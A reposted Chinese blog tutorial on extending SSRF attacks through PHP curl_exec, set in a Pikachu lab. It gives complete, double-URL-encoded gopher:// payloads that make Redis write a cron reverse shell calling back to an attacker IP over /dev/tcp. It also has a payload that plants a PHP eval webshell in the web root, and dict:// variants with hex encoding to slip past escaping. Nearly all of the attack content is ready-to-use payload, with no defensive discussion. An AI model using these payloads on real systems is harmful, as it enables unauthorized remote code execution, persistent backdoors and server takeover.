SSRF漏洞拓展

这篇具有很好参考价值的文章主要介绍了SSRF漏洞拓展。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

SSRF漏洞拓展

目录
  • SSRF漏洞拓展
    • curl_exec函数
      • 一、ssrf配合gopher协议反弹shell
      • 二、ssrf配合gopher协议写马
      • 三、ssrf配合gopher协议ssh免密登录
      • 四、ssrf配合dict协议反弹shell

curl_exec函数

一、ssrf配合gopher协议反弹shell

实验环境:

(1)192.168.142.201     #redis服务器
(2)192.168.142.133     #攻击机
(3)192.168.142.1       #SSRF靶机

1、利用定时任务构造反弹shell

set xx "\n* * * * * bash -i >& /dev/tcp/192.168.142.133/8888 0>&1\n"
config set dir /var/spool/cron
config set dbfilename root
save

2、进行URL编码

%73%65%74%20%78%78%20%22%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%34%32%2e%31%33%33%2f%38%38%38%38%20%30%3e%26%31%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%76%61%72%2f%73%70%6f%6f%6c%2f%63%72%6f%6e%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%72%6f%6f%74%0a%73%61%76%65

3、然后把%0a换成%0d%0a,最后再加上%0d%0a,再进行一次url编码

%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%33%34%25%33%32%25%32%65%25%33%31%25%33%33%25%33%33%25%32%66%25%33%38%25%33%38%25%33%38%25%33%38%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61

4、对参数的gopher协议进行编码

gopher://192.168.142.201:6379/_
编码后:
gopher%3a%2f%2f192.168.142.201%3a6379%2f_

5、拼接成最后的payload

http://192.168.142.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3a%2f%2f192.168.142.201%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%33%34%25%33%32%25%32%65%25%33%31%25%33%33%25%33%33%25%32%66%25%33%38%25%33%38%25%33%38%25%33%38%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61

6、攻击机器开启监听,成功反弹

二、ssrf配合gopher协议写马

1、构造一句话木马

set xx "\n<?php @eval($_POST[test]);?>\n"
config set dir /www/admin/localhost_80/wwwroot
config set dbfilename test.php
save

2、进行URL编码

%73%65%74%20%78%78%20%22%5c%6e%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%74%65%73%74%5d%29%3b%3f%3e%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%77%77%77%2f%61%64%6d%69%6e%2f%6c%6f%63%61%6c%68%6f%73%74%5f%38%30%2f%77%77%77%72%6f%6f%74%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%74%65%73%74%2e%70%68%70%0a%73%61%76%65

3、然后把%0a换成%0d%0a,最后再加上%0d%0a,再进行一次url编码

%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%37%34%25%36%35%25%37%33%25%37%34%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%32%66%25%36%63%25%36%66%25%36%33%25%36%31%25%36%63%25%36%38%25%36%66%25%37%33%25%37%34%25%35%66%25%33%38%25%33%30%25%32%66%25%37%37%25%37%37%25%37%37%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%34%25%36%35%25%37%33%25%37%34%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61

4、对参数的gopher协议进行编码

gopher://192.168.142.201:6379/_
编码后:
gopher%3a%2f%2f192.168.142.201%3a6379%2f_

5、拼接成最后的payload

http://192.168.142.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3a%2f%2f192.168.142.201%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%37%34%25%36%35%25%37%33%25%37%34%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%32%66%25%36%63%25%36%66%25%36%33%25%36%31%25%36%63%25%36%38%25%36%66%25%37%33%25%37%34%25%35%66%25%33%38%25%33%30%25%32%66%25%37%37%25%37%37%25%37%37%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%34%25%36%35%25%37%33%25%37%34%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61

6、用webshell工具连接成功

三、ssrf配合gopher协议ssh免密登录

思路差不多。公钥编码后会特别长,就不粘贴出来了。

四、ssrf配合dict协议反弹shell

1、修改文件名为root

dict://192.168.142.201:6379/config:set:dbfilename root

2、修改存储路径为/var/spool/cron

dict://192.168.142.201:6379/config:set:dir:/var/spool/cron

3、写入反弹shell

dict://192.168.142.201:6379/set:test:"\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.142.133/8888 0>&1\n\n"

如果被转义了可以尝试16进制编码
dict://192.168.142.201:6379/set:test:"\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/192.168.142.133/8888\x200\x3e\x261\n\n"

4、保存文章来源地址https://www.toymoban.com/news/detail-700685.html

dict://192.168.142.201:6379/save

到了这里,关于SSRF漏洞拓展的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Weblogic SSRF漏洞

    2.1bp抓包,测试该漏洞。通过测试端口,查看哪个端口能够进行具体得操作 2.2注入HTTP头,利用Redis反弹shell

    2024年02月07日
    浏览(39)
  • SSRF漏洞

    SSRF(Server-Side Request Forgery:服务器端请求伪造) 严正声明:本文仅限于技术讨论,严禁用于其他用途。 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞 SSRF漏洞形成的原因主要是 服务端提供了从其他服务器应用获取数据的功能,并且未对客户端所传输过来的URL参数进

    2024年02月03日
    浏览(42)
  • 新后端漏洞之----SSRF漏洞(服务端请求伪造)

    这几天各种技术面试接踵而至,压得我喘不过气了!然后面试官问了我这个SSRF漏洞原理和利用方式以及防御手段,当然同时还问了好几个Top10漏洞! 危害:一个不符合预期的请求就可能导致整个内网沦陷 全名 :Server Side Request Forgery 基本原理:攻击者构造恶意的URL,由服务器

    2024年02月11日
    浏览(36)
  • 【SSRF漏洞】实战演示 超详细讲解

    💕💕💕 博主昵称:摆烂阳💕💕💕 🥰博主主页链接https://blog.csdn.net/qinshuoyang1?type=blog 👩‍💻博主研究方向:web渗透测试 、python编程 📃 博主寄语:希望本篇文章能给大家带来帮助,有不足的地方,希望友友们给予指导 ———————————————— 第一步: 创建

    2024年02月04日
    浏览(40)
  • SSRF+redis未授权漏洞复现

    1.SSRF 漏洞简介 SSRF(Server-Side Request Forgery)即服务器端请求伪造,是一种由攻击者构造攻击链传给服务器,服务器执行并发起请求造成安全问题的漏洞,一般用来在外网探测或攻击内网服务。当网站需要调用指定URL地址的资源,但是没有对这个URL做好过滤,就会导致可以访问

    2024年02月07日
    浏览(49)
  • PHP代码审计8—SSRF 漏洞

    1、漏洞原理与防御方法 1) 漏洞原理 SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能,并且没有对目标地址做过滤与限制。例如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造。 2)防御方法 过滤返

    2024年02月09日
    浏览(44)
  • 服务端请求伪造(SSRF)及漏洞复现

    服务器会根据用户提交的URL 发送一个HTTP 请求。使用用户指定的URL,Web 应用可以获取图片或者文件资源等。典型的例子是百度识图功能。 如果没有对用户提交URL 和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造”的缺陷。“请求伪造”,顾名思义,

    2024年02月09日
    浏览(42)
  • 服务端请求伪造(SSRF)及漏洞复现

    服务器会根据用户提交的URL发送一个HTTP请求。使用用户指定的URL,Web应用可以获取图片或者文件资源等。典型的例子是百度识图功能。 如果没有对用户提交URL和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造\\\"的缺陷。“请求伪造”,顾名思义,攻击

    2024年02月09日
    浏览(41)
  • 【web渗透】SSRF漏洞超详细讲解

    💕💕💕 博主昵称:摆烂阳💕💕💕 🥰博主主页跳转链接 👩‍💻博主研究方向:web渗透测试 、python编程 📃 博主寄语:希望本篇文章能给大家带来帮助,有不足的地方,希望友友们给予指导 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发

    2024年01月15日
    浏览(52)
  • 记一次SSRF漏洞的学习和利用

    导语:本文主要记录一次我们在复盘嘶吼网站渗透报告时遇到的一个SSRF漏洞。 本文主要记录一次我们在复盘嘶吼网站渗透报告时遇到的一个SSRF漏洞。此漏洞并结合腾讯云的API接口,可以获取大量嘶吼服务器的敏感信息。利用这些敏感信息,又可以进行更为深入的渗透。 这篇

    2024年02月06日
    浏览(60)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包